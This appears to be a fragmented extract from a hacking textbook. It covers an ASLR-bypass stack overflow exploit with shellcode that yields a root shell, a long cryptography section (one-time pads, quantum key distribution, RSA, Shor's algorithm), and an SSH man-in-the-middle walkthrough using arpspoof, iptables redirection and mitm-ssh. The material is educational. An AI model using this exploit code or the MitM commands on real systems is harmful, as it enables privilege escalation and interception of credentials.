reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfbb0bc4 - 0xbff3e710"
$1 = 4291241140
reader@hacking:~/booksrc $
...
I'm sure this wasn't always the case, but the progress of open source is
rather constant
...

Playing the Odds
Using execl() at least limits the randomness and gives us a ballpark address
range
...
A quick
examination of aslr_demo shows that the overflow buffer needs to be 80 bytes to
overwrite the stored return address on the stack
...
/aslr_demo
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
"BBBB"')
Starting program: /home/reader/booksrc/aslr_demo $(perl -e 'print "AAAA"x19
...

0x42424242 in ?? ()
(gdb) p 20*4
$1 = 80
(gdb) quit
The program is running
...
This
allows us to inject as much of a NOP sled as needed
...

aslr_execl_exploit
...
h>
#include ...
h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80"; // Standard shellcode
int main(int argc, char *argv[]) {
unsigned int i, ret, offset;
char buffer[1000];
printf("i is at %p\n", &i);
if(argc > 1) // Set offset
...

printf("ret addr is %p\n", ret);
for(i=0; i < 90; i+=4) // Fill buffer with return address
...

memcpy(buffer+900, shellcode, sizeof(shellcode));
execl("
...
The value 200 is added to the return address
to skip over the first 90 bytes used for the overwrite, so execution lands
somewhere in the NOP sled
...
/aslr_demo
reader@hacking:~/booksrc $ sudo chmod u+s
...
c
reader@hacking:~/booksrc $
...
out
i is at 0xbfa3f26c
ret addr is 0xb79f6de4
buffer is at 0xbfa3ee80
Segmentation fault
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfa3f26c - 0xbfa3ee80"
$1 = 1004
reader@hacking:~/booksrc $
...
out 1004
i is at 0xbfe9b6cc
ret addr is 0xbfe9b3a8
buffer is at 0xbfe9b2e0
sh-3
...
/a
...
/a
...
2# whoami
root
sh-3
...
This leverages the fact that we can try the exploit as
many times as we want
...
Try writing an exploit to do this
...
Since the rules of a program
are defined by its creators, exploiting a supposedly secure program is simply a
matter of beating them at their own game
...
A hacker's ingenuity tends to find holes in these systems
...

Chapter 0x700
...
Cryptography is
simply the process of communicating secretly through the use of ciphers, and
cryptanalysis is the process of cracking or deciphering such secret communications
...

The wartime applications still exist, but the use of cryptography in civilian life is
becoming increasingly popular as more critical transactions occur over the
Internet
...
Passwords,
credit card numbers, and other proprietary information can all be sniffed and
stolen over unencrypted protocols
...

Without Secure Sockets Layer (SSL) encryption, credit card transactions at
popular websites would be either very inconvenient or insecure
...
Currently, cryptosystems that can be proven to be secure are far too
unwieldy for practical use
...
This means that it's possible that
shortcuts for defeating these ciphers exist, but no one's been able to actualize
them yet
...
This
could be due to the implementation, key size, or simply cryptanalytic weaknesses
in the cipher itself
...
This limit on key size makes the
corresponding cipher insecure, as was shown by RSA Data Security and Ian
Goldberg, a graduate student from the University of California, Berkeley
...
This was strong evidence that 40-bit
keys aren't large enough for a secure cryptosystem
...
At the purest level, the
challenge of solving a puzzle is enticing to the curious
...
Breaking
or circumventing the cryptographic protections of secret data can provide a
certain sense of satisfaction, not to mention a sense of the protected data's
contents
...

Expensive network intrusion detection systems designed to sniff network traffic
for attack signatures are useless if the attacker is using an encrypted
communication channel
...

Information Theory
Many of the concepts of cryptographic security stem from the mind of Claude
Shannon
...
Although the following concepts of
unconditional security, one-time pads, quantum key distribution, and
computational security weren't actually conceived by Shannon, his ideas on
perfect secrecy and information theory had great influence on the definitions of
security
...
This implies that cryptanalysis
is impossible and that even if every possible key were tried in an exhaustive
brute-force attack, it would be impossible to determine which key was the correct one
...
A one-time pad is a very simple cryptosystem that uses blocks of random data called
pads
...
Two identical pads are made: one for the recipient and
one for the sender
...
After the message is
encoded, the pad is destroyed to ensure that it is only used once
...
When the
recipient receives the encrypted message, he also XORs each bit of the encrypted
message with the corresponding bit of his pad to produce the original plaintext
message
...
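The XOR step described above can be sketched in a few lines of C. This is only an illustration: the function name otp_xor is made up for this example, and it assumes the pad bytes have already been generated from a truly random source and shared securely.

```c
#include <assert.h>
#include <stddef.h>

/* XOR each byte of `in` with the matching byte of `pad`, writing to `out`.
 * The same call encrypts and decrypts, because (m ^ p) ^ p == m.
 * The pad must be at least `len` bytes long and must never be reused. */
void otp_xor(const unsigned char *in, const unsigned char *pad,
             unsigned char *out, size_t len)
{
    assert(in != NULL && pad != NULL && out != NULL);
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ pad[i];
}
```

Calling otp_xor() once on the plaintext gives the ciphertext, and calling it again on the ciphertext with the same pad gives the plaintext back.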
The security of the one-time pad hinges on the security of
the pads
...
To be truly secure, this
could involve a face-to-face meeting and exchange, but for convenience, the pad
transmission may be facilitated via yet another cipher
...
Since the pad consists of
random data of the same length as the plaintext message, and since the security
of the whole system is only as good as the security of pad transmission, it usually
makes more sense to just send the plaintext message encoded using the same
cipher that would have been used to transmit the pad
...
One of these is a practical implementation of the one-time pad, made
possible by quantum key distribution
...
This is done using nonorthogonal quantum states in photons
...
Nonorthogonal simply means the states are
separated by an angle that isn't 90 degrees
...

The rectilinear basis of the horizontal and vertical polarizations is incompatible
with the diagonal basis of the two diagonal polarizations, so, due to the
Heisenberg uncertainty principle, these two sets of polarizations cannot both be
measured
...
When a photon passes through
the correct filter, its polarization won't change, but if it passes through the
incorrect filter, its polarization will be randomly modified
...

These strange aspects of quantum mechanics were put to good use by Charles
Bennett and Gilles Brassard in the first and probably best-known quantum key
distribution scheme, called BB84
...
In
this scheme, 1 could be represented by both vertical photon polarization and one
of the diagonal polarizations (positive 45 degrees), while 0 could be represented
by horizontal polarization and the other diagonal polarization (negative 45
degrees)
...

Then, the sender sends a stream of random photons, each coming from a
randomly chosen basis (either rectilinear or diagonal), and these photons are
recorded
...
Now, the two parties publicly compare which basis they used for each
photon, and they keep only the data corresponding to the photons they both
measured using the same basis
...
This makes up the key for the one-time pad
...
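The public basis comparison is ordinary bookkeeping and can be sketched in C. Nothing quantum is simulated here. The function name bb84_sift and the encoding of the bases as 0 (rectilinear) and 1 (diagonal) are assumptions made for this example.

```c
#include <assert.h>
#include <stddef.h>

/* Basis labels for this sketch: 0 = rectilinear, 1 = diagonal. */

/* Keep only the bits for which sender and receiver chose the same basis.
 * Returns the number of bits written to `key`. */
size_t bb84_sift(const int *sender_basis, const int *receiver_basis,
                 const int *sender_bits, int *key, size_t n)
{
    assert(sender_basis && receiver_basis && sender_bits && key);
    size_t kept = 0;
    for (size_t i = 0; i < n; i++) {
        if (sender_basis[i] == receiver_basis[i])
            key[kept++] = sender_bits[i];
    }
    return kept;
}
```

On average about half of the photons survive this step, since the receiver guesses the right basis roughly half of the time.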
If there are too many
errors, someone was probably eavesdropping, and the key should be thrown
away
...

Computational Security
A cryptosystem is considered to be computationally secure if the best-known algorithm
for breaking it requires an unreasonable amount of computational resources and
time
...
Usually, the time needed to break a computationally secure
cryptosystem is measured in tens of thousands of years, even with the assumption
of a vast array of computational resources
...

It's important to note that the best-known algorithms for breaking cryptosystems
are always evolving and being improved
...
So, the current best-known algorithm is used instead to measure a
cryptosystem's security
...
Since an
algorithm is simply an idea, there's no limit to the processing speed for evaluating
the algorithm
...

Without factors such as processor speed and architecture, the important
unknown for an algorithm is input size
...
The input size is generally denoted by n, and each atomic step can be
expressed as a number
...

for(i = 1 to n) {
Do something;
Do another thing;
}
Do one last thing;

This algorithm loops n times, each time doing two actions, and then does one last
action, so the time complexity for this algorithm would be 2n + 1
...

for(x = 1 to n) {
for(y = 1 to n) {
Do the new action;
}
}
for(i = 1 to n) {
Do something;
Do another thing;
}
Do one last thing;
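
One way to check a step count is to let the machine do the counting. The sketch below mirrors the two pseudocode listings above; the function names are invented for this example, and each "Do ..." line is assumed to cost exactly one step.

```c
#include <assert.h>

/* Steps for the first listing: two actions per pass plus one final action. */
unsigned long steps_single_loop(unsigned long n)
{
    unsigned long steps = 0;
    for (unsigned long i = 1; i <= n; i++)
        steps += 2;            /* "Do something" and "Do another thing" */
    return steps + 1;          /* "Do one last thing" */
}

/* Steps for the second listing: an n-by-n nested loop runs first. */
unsigned long steps_with_nested_loop(unsigned long n)
{
    assert(n <= 10000UL);      /* keep the n * n loop short in this sketch */
    unsigned long steps = 0;
    for (unsigned long x = 1; x <= n; x++)
        for (unsigned long y = 1; y <= n; y++)
            steps++;           /* "Do the new action" */
    return steps + steps_single_loop(n);
}
```

For n = 10, the first function returns 21 (2n + 1) and the second returns 121 (n^2 + 2n + 1).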

But this level of detail for time complexity is still too granular
...
However, as n becomes larger, the relative difference between 2n^2 +
5 and 2n + 5 becomes larger and larger
...

Consider two algorithms, one with a time complexity of 2n + 365 and the other
with 2n^2 + 5
...
But the two expressions cross between n = 13 and n = 14, and for all n of 14 or
greater, the 2n + 365 algorithm will outperform the 2n^2 + 5 algorithm
...
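Evaluating both cost expressions directly is a simple way to locate the point where one algorithm overtakes the other. The helper names below are made up for this sketch, and the search limit is an arbitrary choice.

```c
#include <assert.h>

unsigned long cost_linear(unsigned long n)    { return 2 * n + 365; }
unsigned long cost_quadratic(unsigned long n) { return 2 * n * n + 5; }

/* Return the smallest n in [1, limit] where the linear-cost algorithm
 * takes fewer steps than the quadratic one, or 0 if there is none. */
unsigned long first_n_where_linear_wins(unsigned long limit)
{
    assert(limit <= 10000UL);   /* keeps 2 * n * n well inside 32 bits */
    for (unsigned long n = 1; n <= limit; n++) {
        if (cost_linear(n) < cost_quadratic(n))
            return n;
    }
    return 0;
}
```

The same search works for any pair of cost functions, which makes it a handy sanity check when comparing growth rates by hand.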

This means that, in general, the growth rate of the time complexity of an
algorithm with respect to input size is more important than the time complexity
for any fixed input
...

Asymptotic Notation
Asymptotic notation is a way to express an algorithm's efficiency
...

Returning to the examples of the 2n + 365 algorithm and the 2n^2 + 5 algorithm,
we determined that the 2n + 365 algorithm is generally more efficient because it
follows the trend of n, while the 2n^2 + 5 algorithm follows the general trend of n^2
...

This sounds kind of confusing, but all it really means is that there exists a positive
constant for the trend value and a lower bound on n, such that the trend value
multiplied by the constant will always be greater than the time complexity for all n
greater than the lower bound
...
There's a convenient mathematical notation for this,
called big-oh notation, which looks like O(n^2) to describe an algorithm that is in the
order of n^2
...
So an algorithm with a time complexity of 3n^4 +
43n^3 + 763n + log n + 37 would be in the order of O(n^4), and 54n^7 + 23n^4 + 4325
would be O(n^7)
...
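The "positive constant and lower bound on n" wording can be made concrete with a quick numerical check. The sketch below uses the 2n^2 + 5 example; the function names and the finite test range are assumptions of this example, and a finite check like this illustrates the definition rather than proving it.

```c
#include <assert.h>

/* Time complexity from the earlier example: T(n) = 2n^2 + 5. */
unsigned long t_of_n(unsigned long n) { return 2 * n * n + 5; }

/* Check that c * n^2 >= T(n) for every n in [n0, limit].
 * Returns 1 if the bound holds over the whole range, 0 otherwise. */
int bound_holds(unsigned long c, unsigned long n0, unsigned long limit)
{
    assert(c <= 100UL && limit <= 1000UL);   /* keep products small */
    for (unsigned long n = n0; n <= limit; n++) {
        if (c * n * n < t_of_n(n))
            return 0;
    }
    return 1;
}
```

With the constant 3 and a lower bound of n = 3, the bound holds, since 3n^2 is at least 2n^2 + 5 whenever n^2 is at least 5. With the constant 2, no lower bound works, because 2n^2 is always 5 short.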
The encryption and decryption process is generally faster than with
asymmetric encryption, but key distribution can be difficult
...
A block cipher
operates on blocks of a fixed size, usually 64 or 128 bits
...

DES, Blowfish, and AES (Rijndael) are all block ciphers
...
This is
called the keystream, and it is XORed with the plaintext
...
RC4 and LFSR are examples of popular stream
ciphers
...
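To make the keystream idea concrete, here is a toy stream cipher built on a 16-bit linear feedback shift register (LFSR). It is a sketch for illustration only: the tap positions are a commonly cited textbook choice, the function names are invented, and a lone LFSR like this is not a secure cipher.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Advance a 16-bit Fibonacci LFSR one step and return the output bit.
 * Taps 16, 14, 13, 11 are a commonly cited example polynomial. */
static unsigned lfsr_step(uint16_t *state)
{
    uint16_t s = *state;
    unsigned out = s & 1u;
    uint16_t bit = (uint16_t)((s ^ (s >> 2) ^ (s >> 3) ^ (s >> 5)) & 1u);
    *state = (uint16_t)((s >> 1) | (bit << 15));
    return out;
}

/* XOR `len` bytes of `in` with keystream bytes derived from `seed`.
 * Running it again with the same seed restores the input. */
void lfsr_stream_xor(uint16_t seed, const unsigned char *in,
                     unsigned char *out, size_t len)
{
    assert(seed != 0);   /* an all-zero LFSR state never changes */
    uint16_t state = seed;
    for (size_t i = 0; i < len; i++) {
        unsigned char k = 0;
        for (int b = 0; b < 8; b++)
            k = (unsigned char)((k << 1) | lfsr_step(&state));
        out[i] = in[i] ^ k;
    }
}
```

The seed plays the role of the key here. Both sides generate the same keystream from it, so the same function serves for encryption and decryption.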
11b Encryption" on
Wireless 802
...

DES and AES are both popular block ciphers
...
Two concepts used repeatedly in block ciphers are confusion and
diffusion
...
This means that the output bits must involve
some complex transformation of the key and plaintext
...
Product ciphers combine both of these concepts by using various simple
operations repeatedly
...

DES also uses a Feistel network
...
Basically, each block is divided into two halves, left (L)
and right (R)
...
Usually, each round of operation has a separate
subkey, which is calculated earlier
...
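The general shape of a Feistel network can be sketched with a toy round function. This is not DES: the round function, the 32-bit half size, and all names below are assumptions chosen to keep the example short. It uses the usual Feistel rule that the new left half is the old right half, and the new right half is the old left half XORed with a function of the old right half and the subkey.

```c
#include <assert.h>
#include <stdint.h>

/* Toy round function for illustration only; real ciphers such as DES use
 * a far more elaborate function of the half-block and subkey. */
static uint32_t toy_round(uint32_t half, uint32_t subkey)
{
    return (half * 2654435761u) ^ subkey;
}

/* Run `rounds` Feistel rounds over the halves *l and *r.
 * Each round: new L = old R, new R = old L XOR f(old R, subkey). */
void feistel_encrypt(uint32_t *l, uint32_t *r,
                     const uint32_t *subkeys, int rounds)
{
    assert(l && r && subkeys && rounds > 0);
    for (int i = 0; i < rounds; i++) {
        uint32_t next_r = *l ^ toy_round(*r, subkeys[i]);
        *l = *r;
        *r = next_r;
    }
}

/* Undo feistel_encrypt by walking the subkeys in reverse order. */
void feistel_decrypt(uint32_t *l, uint32_t *r,
                     const uint32_t *subkeys, int rounds)
{
    assert(l && r && subkeys && rounds > 0);
    for (int i = rounds - 1; i >= 0; i--) {
        uint32_t prev_l = *r ^ toy_round(*l, subkeys[i]);
        *r = *l;
        *l = prev_l;
    }
}
```

Notice that decryption never needs to invert toy_round(). The XOR cancels it out, which is why the round function in a Feistel cipher doesn't have to be reversible.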
This number was specifically chosen to defend
against differential cryptanalysis
...

Since the key is only 56 bits, the entire keyspace can be checked in an exhaustive
brute-force attack in a few weeks on specialized hardware
...
Encryption is done by encrypting the plaintext block
with the first key, then decrypting with the second key, and then encrypting again
with the first key
...
The added key size makes a brute-force effort
exponentially more difficult
...
However, quantum computation provides some interesting
possibilities, which are generally overhyped
...
A quantum
computer can store many different states in a superposition (which can be
thought of as an array) and perform calculations on all of them at once
...
The superposition can be
loaded up with every possible key, and then the encryption operation can be
performed on all the keys at the same time
...
Quantum computers are weird in that when the
superposition is looked at, the whole thing decoheres into a single state
...

Without some way to manipulate the odds of the superposition states, the same
effect could be achieved by just guessing keys
...
This algorithm allows the odds of a certain desired state to
increase while the others decrease
...

This takes about √n steps
...
So, for the ultra paranoid,
doubling the key size of a block cipher will make it resistant to even the
theoretical possibilities of an exhaustive brute-force attack with a quantum
computer
...
The public key is
made public, while the private key is kept private; hence the clever names
...
This removes the issue of key distribution—public keys are public, and
by using the public key, a message can be encrypted for the corresponding
private key
...
However, asymmetric ciphers
tend to be quite a bit slower than symmetric ciphers
...
The security of RSA is
based on the difficulty of factoring large numbers
...
This is known as Euler's totient function, and it is usually denoted by
the lowercase Greek letter phi (φ)
...
It should
be easy to notice that if N is prime, φ(N) will be N – 1
...
This comes in handy, since φ(N) must be calculated for RSA
...
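For small numbers, the totient can simply be counted by brute force, which makes a useful check on hand calculations. The sketch below takes that direct approach; the function names are made up for this example, and the loop is far too slow for the large values used in real RSA keys.

```c
#include <assert.h>

static unsigned long gcd_ul(unsigned long a, unsigned long b)
{
    while (b != 0) {
        unsigned long r = a % b;
        a = b;
        b = r;
    }
    return a;
}

/* Count the integers in [1, n) that are relatively prime to n. */
unsigned long totient(unsigned long n)
{
    assert(n >= 2);
    unsigned long count = 0;
    for (unsigned long k = 1; k < n; k++) {
        if (gcd_ul(k, n) == 1)
            count++;
    }
    return count;
}
```

For the prime 11 this returns 10, and for 143 (which is 11 · 13) it returns 120, which is 10 · 12.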

Then a decryption key must be found that satisfies the following equation, where S
is any integer:
E · D = S · φ(N) + 1
This can be solved with the extended Euclidean algorithm
...
The larger of the two numbers is divided
by the smaller number, paying attention only to the remainder
...
The last value for the remainder before it reaches zero is the
greatest common divisor of the two original numbers
...
That means that it should take about as many steps
to find the answer as the number of digits in the larger number
...
The table starts by putting the two numbers in the columns A and B,
with the larger number in column A
...
On the next line, the old B becomes the new A, and the old R
becomes the new B
...
The last value of R before zero is the greatest common divisor
...
That means that 7253 and
120 are relatively prime to each other
...
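The table-based procedure translates almost line for line into a loop. The function name euclid_gcd is an assumption of this sketch; the variables follow the A, B, and R columns described above.

```c
#include <assert.h>

/* Euclid's algorithm: repeatedly replace (A, B) with (B, A mod B).
 * The last nonzero remainder is the greatest common divisor. */
unsigned long euclid_gcd(unsigned long a, unsigned long b)
{
    assert(a != 0 || b != 0);      /* gcd(0, 0) is undefined */
    while (b != 0) {
        unsigned long r = a % b;   /* column R in the table */
        a = b;                     /* old B becomes the new A */
        b = r;                     /* old R becomes the new B */
    }
    return a;
}
```

Calling euclid_gcd(7253, 120) returns 1, matching the result of the table.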

This is done by working the Euclidean algorithm backward
...
Here is the math from the prior example, with the
quotients:
7253 = 60 · 120 + 53
120 = 2 · 53 + 14
53 = 3 · 14 + 11
14 = 1 · 11 + 3
11 = 3 · 3 + 2
3 = 1 · 2 + 1
With a little bit of basic algebra, the terms can be moved around for each line so
the remainder (shown in bold) is by itself on the left of the equal sign:
53 = 7253 – 60 · 120
14 = 120 – 2 · 53
11 = 53 – 3 · 14
3 = 14 – 1 · 11
2 = 11 – 3 · 3
1 = 3 – 1 · 2
Starting from the bottom, it's clear that:
1 = 3 – 1 · 2
The line above that, though, is 2 = 11 – 3 · 3, which gives a substitution for 2:
1 = 3 – 1 · (11 – 3 · 3)
1 = 4 · 3 – 1 · 11
The line above that shows that 3 = 14 – 1 · 11, which can also be substituted in for
3:
1 = 4 · (14 – 1 · 11) – 1 · 11
1 = 4 · 14 – 5 · 11
Of course, the line above that shows that 11 = 53 – 3 · 14, prompting another
substitution:
1 = 4 · 14 – 5 · (53 – 3 · 14)
1 = 19 · 14 – 5 · 53
Following the pattern, we use the line that shows 14 = 120 – 2 · 53, resulting in
another substitution:
1 = 19 · (120 – 2 · 53) – 5 · 53
1 = 19 · 120 – 43 · 53
And finally, the top line shows that 53 = 7253 – 60 · 120, for a final substitution:
1 = 19 · 120 – 43 · (7253 – 60 · 120)
1 = 2599 · 120 – 43 · 7253
2599 · 120 + (–43) · 7253 = 1
This shows that J and K would be 2599 and –43, respectively
...
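The back-substitution above can be automated by carrying the two coefficients along with each remainder. The sketch below is one common iterative form of the extended Euclidean algorithm, not necessarily how any particular library does it; the names ext_gcd and mod_inverse are invented for this example.

```c
#include <assert.h>

/* Extended Euclidean algorithm.
 * Returns gcd(a, b) and stores x, y such that a*x + b*y == gcd(a, b). */
long ext_gcd(long a, long b, long *x, long *y)
{
    assert(x != 0 && y != 0 && a > 0 && b > 0);
    long old_r = a, r = b;
    long old_s = 1, s = 0;
    long old_t = 0, t = 1;
    while (r != 0) {
        long q = old_r / r;
        long tmp;
        tmp = old_r - q * r; old_r = r; r = tmp;
        tmp = old_s - q * s; old_s = s; s = tmp;
        tmp = old_t - q * t; old_t = t; t = tmp;
    }
    *x = old_s;
    *y = old_t;
    return old_r;
}

/* Modular inverse of e modulo m, or 0 if e and m are not coprime. */
long mod_inverse(long e, long m)
{
    long x, y;
    if (ext_gcd(e, m, &x, &y) != 1)
        return 0;
    return ((x % m) + m) % m;   /* fold a negative coefficient into [0, m) */
}
```

For ext_gcd(7253, 120, &x, &y), x comes back as -43 and y as 2599, the same pair found by hand. Reducing -43 modulo 120 gives 77, which is what mod_inverse(7253, 120) returns.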

Assuming the values for P and Q are 11 and 13, N would be 143
...
Since 7253 is relatively prime to 120, that number makes
an excellent value for E
...
The value for S doesn't really matter, which means this math is done modulo
φ(N), or modulo 120
...
This can be put into the prior equation from above:
E · D = S · φ(N) + 1

7253 · 77 = 4654 · 120 + 1
The values for N and E are distributed as the public key, while D is kept secret as
the private key
...
The encryption and decryption functions
are fairly simple
...
Then, only someone who knew the value for D could
decrypt the message and recover the number 98 from the number 76, as follows:
76^77 = 98 (mod 143)
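With numbers this small, the whole round trip can be checked in C. The sketch below uses square-and-multiply exponentiation so the intermediate values never grow large. The function names are made up for this example, and the size limit on the modulus is an assumption that keeps everything inside ordinary integer types; real RSA needs a big-number library.

```c
#include <assert.h>

/* Square-and-multiply modular exponentiation: (base ^ exp) mod m.
 * Safe for the small moduli used here; m * m must fit in unsigned long. */
unsigned long mod_pow(unsigned long base, unsigned long exp, unsigned long m)
{
    assert(m > 1 && m <= 65535UL);
    unsigned long result = 1;
    base %= m;
    while (exp > 0) {
        if (exp & 1UL)
            result = (result * base) % m;
        base = (base * base) % m;
        exp >>= 1;
    }
    return result;
}

unsigned long rsa_encrypt(unsigned long msg, unsigned long e, unsigned long n)
{
    assert(msg < n);   /* larger messages must be split into chunks */
    return mod_pow(msg, e, n);
}

unsigned long rsa_decrypt(unsigned long cipher, unsigned long d, unsigned long n)
{
    return mod_pow(cipher, d, n);
}
```

With N = 143, E = 7253, and D = 77, rsa_encrypt(98, 7253, 143) returns 76 and rsa_decrypt(76, 77, 143) returns 98.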
Obviously, if the message, M, is larger than N, it must be broken down into chunks
that are smaller than N
...
It states that if M and N
are relatively prime, with M being the smaller number, then when M is multiplied
by itself φ(N) times and divided by N, the remainder will always be 1:
If gcd(M, N) = 1 and M < N then M^φ(N) = 1 (mod N)
Since this is all done modulo N, the following is also true, due to the way
multiplication works in modulus arithmetic:
M^φ(N) · M^φ(N) = 1 · 1 (mod N)
M^(2 · φ(N)) = 1 (mod N)
This process could be repeated again and again S times to produce this:
M^(S · φ(N)) = 1 (mod N)
If both sides are multiplied by M, the result is:
M^(S · φ(N)) · M = 1 · M (mod N)
M^(S · φ(N) + 1) = M (mod N)
This equation is basically the core of RSA
...
This is basically a function that returns
its own input, which isn't all that interesting by itself
...
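The claim that raising M to the power S · φ(N) + 1 returns M can be checked exhaustively for a small modulus. This sketch only tests values of M that are relatively prime to N, as the theorem requires; the function names and the size limits are assumptions made for this example.

```c
#include <assert.h>

static unsigned long gcd_ul(unsigned long a, unsigned long b)
{
    while (b != 0) {
        unsigned long r = a % b;
        a = b;
        b = r;
    }
    return a;
}

static unsigned long mod_pow(unsigned long base, unsigned long exp,
                             unsigned long m)
{
    unsigned long result = 1;
    base %= m;
    while (exp > 0) {
        if (exp & 1UL)
            result = (result * base) % m;
        base = (base * base) % m;
        exp >>= 1;
    }
    return result;
}

/* Return 1 if M^(s * phi + 1) mod n == M for every M in [1, n) that is
 * relatively prime to n, and 0 otherwise. */
int returns_own_input(unsigned long n, unsigned long phi, unsigned long s)
{
    assert(n > 1 && n <= 65535UL && phi <= 10000UL && s <= 10000UL);
    for (unsigned long m = 1; m < n; m++) {
        if (gcd_ul(m, n) != 1)
            continue;
        if (mod_pow(m, s * phi + 1, n) != m)
            return 0;
    }
    return 1;
}
```

For N = 143 and φ(N) = 120 the check passes for any S tried, while substituting a wrong value for φ(N), such as 7, makes it fail.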
This can be done by
finding two numbers, E and D, that multiplied together equal S times φ(N) plus 1
...
The security of the algorithm is tied to keeping D secret
...
Therefore, the key sizes for
RSA must be chosen with the best-known factoring algorithm in mind to maintain
computational security
...
This algorithm has a subexponential run
time, which is pretty good, but still not fast enough to crack a 2,048-bit RSA key in
a reasonable amount of time
...
Peter Shor was able to take advantage of the massive parallelism of
quantum computers to efficiently factor numbers using an old number-theory
trick
...
Take a number, N, to factor
...
This value should also be relatively prime to N, but
assuming that N is the product of two prime numbers (which will always be the
case when trying to factor numbers to break RSA), if A isn't relatively prime to N,
then A is one of N's factors
...
This is all
done at the same time, through the magic of quantum computation
...

Luckily, this can be done quickly on a quantum computer with a Fourier
transform
...

Then, simply calculate gcd(A^(R/2) + 1, N) and gcd(A^(R/2) – 1, N)
...
This is possible because A^R = 1 (mod N) and is
further explained below
...
As long as these
values don't zero themselves out, one of them will have a factor in common with N
...
In this
case N equals 143
...
The function will look like f(x) = 21^x (mod 143)
...

To keep this brief, the assumption will be that the quantum computer has three
quantum bits, so the superposition can hold eight values
...
Armed with this information,
gcd(21^2 – 1, 143) and gcd(21^2 + 1, 143) should produce at least one of the factors
...
These factors can then be used to recalculate the private key for the
previous RSA example
...
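The number-theory half of this example runs fine on an ordinary computer when N is tiny. In the sketch below, a plain loop stands in for the quantum period-finding step, so it shows what is being computed rather than how a quantum computer computes it. All function names are invented for this example.

```c
#include <assert.h>

static unsigned long gcd_ul(unsigned long a, unsigned long b)
{
    while (b != 0) {
        unsigned long r = a % b;
        a = b;
        b = r;
    }
    return a;
}

static unsigned long mod_pow(unsigned long base, unsigned long exp,
                             unsigned long m)
{
    unsigned long result = 1;
    base %= m;
    while (exp > 0) {
        if (exp & 1UL)
            result = (result * base) % m;
        base = (base * base) % m;
        exp >>= 1;
    }
    return result;
}

/* Smallest R > 0 with a^R mod n == 1, found by plain iteration.
 * Returns 0 if no such R below n exists. */
unsigned long find_period(unsigned long a, unsigned long n)
{
    assert(n > 1 && n <= 65535UL);
    unsigned long value = a % n;
    for (unsigned long r = 1; r < n; r++) {
        if (value == 1)
            return r;
        value = (value * a) % n;
    }
    return 0;
}

/* Given an even period r, compute gcd(a^(r/2) - 1, n) and
 * gcd(a^(r/2) + 1, n). The power is reduced modulo n first, which
 * leaves the gcd unchanged. Either result may be a trivial factor. */
void factors_from_period(unsigned long a, unsigned long r, unsigned long n,
                         unsigned long *f1, unsigned long *f2)
{
    assert(r % 2 == 0 && f1 && f2);
    unsigned long half = mod_pow(a, r / 2, n);
    *f1 = gcd_ul(half + n - 1, n);   /* a^(r/2) - 1, kept non-negative */
    *f2 = gcd_ul(half + 1, n);
}
```

For A = 21 and N = 143, find_period() returns 4, and factors_from_period() then yields 11 and 13.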
An asymmetric cipher is used
to exchange a randomly generated key that is used to encrypt the remaining
communications with a symmetric cipher
...
Hybrid
ciphers are used by most modern cryptographic applications, such as SSL, SSH,
and PGP
...
However, if an attacker can intercept
communications between both parties and masquerade as one or the other, the
key exchange algorithm can be attacked
...
The
attacker sits between the two communicating parties, with each party believing
they are communicating with the other party, but both are communicating with
the attacker
...
Usually, this key is
used to encrypt further communication between the two parties
...

However, in an MitM attack, party A believes that she is communicating with B,
and party B believes he is communicating with A, but in reality, both are
communicating with the attacker
...
Then the attacker just needs to open another encrypted
connection with B, and B will believe that he is communicating with A, as shown in
the following illustration
...

This means that the attacker actually maintains two separate encrypted
communication channels with two separate encryption keys
...
The attacker then decrypts these packets with the first key and re-encrypts
them with the second key
...
By sitting in the
middle and maintaining two separate keys, the attacker is able to sniff and even
modify traffic between A and B without either side being the wiser
...
Most of these are just
modifications to the existing openssh source code
...

This can all be done with the ARP redirection technique from "Active Sniffing"
and a modified openssh package aptly called mitm-ssh
...
The source package is on the LiveCD in /usr/src/mitm-ssh,
and it has already been built and installed
...
With the help of arpspoof to poison ARP caches,
traffic to the target SSH server can be redirected to the attacker's machine
running mitm-ssh
...

In the example below, the target SSH server is at 192
...
42
...
When mitm-ssh
is run, it will listen on port 2222, so it doesn't need to be run as root
...

reader@hacking:~ $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT
--to-ports 2222
reader@hacking:~ $ sudo iptables -t nat -L
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
REDIRECT tcp -- anywhere anywhere tcp dpt:ssh redir ports 2222
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
reader@hacking:~ $ mitm-ssh

...
9p1]
_|_ By CMN ...
168
...
72 -v -n -p 2222
Using static route to 192
...
42
...
0
...
0 port 2222
...

RSA key generation complete
...
168
...
72 to
our machine, instead
...
3
Usage: arpspoof [-i interface] [-t target] host
reader@hacking:~ $ sudo arpspoof -i eth0 192
...
42
...
168
...
72 is-at 0:12:3f:7:39:9c
0:12:3f:7:39:9c ff:ff:ff:ff:ff:ff 0806 42: arp reply 192
...
42
...
168
...
72 is-at 0:12:3f:7:39:9c

And now the MitM attack is all set up and ready for the next unsuspecting victim
...
168
...
250),
which makes an SSH connection to 192
...
42
...

On Machine 192
...
42
...
168
...
72 (loki)
iz@tetsuo:~ $ ssh jose@192
...
42
...
168
...
72 (192
...
42
...

RSA key fingerprint is 84:7a:71:58:0f:b5:5e:1b:17:d7:b5:9c:81:5a:56:7c
...
168
...
72' (RSA) to the list of known hosts
...
168
...
72's password:
Last login: Mon Oct 1 06:32:37 2007 from 192
...
42
...
6
...
bash_logout
...
bashrc
...
swp
...
168
...
72 closed
...
However, the
connection was secretly routed through the attacker's machine, which used a
separate encrypted connection back to the target server
...

On the Attacker's Machine
reader@hacking:~ $ sudo mitm-ssh 192
...
42
...
168
...
72:22
SSH MITM Server listening on 0
...
0
...

Generating 768 bit RSA key
...

WARNING: /usr/local/etc/moduli does not exist, using fixed modulus
[MITM] Found real target 192
...
42
...
168
...
250:1929
[MITM] Routing SSH2 192
...
42
...
168
...
72:22
[2007-10-01 13:33:42] MITM (SSH2) 192
...
42
...
168
...
72:22
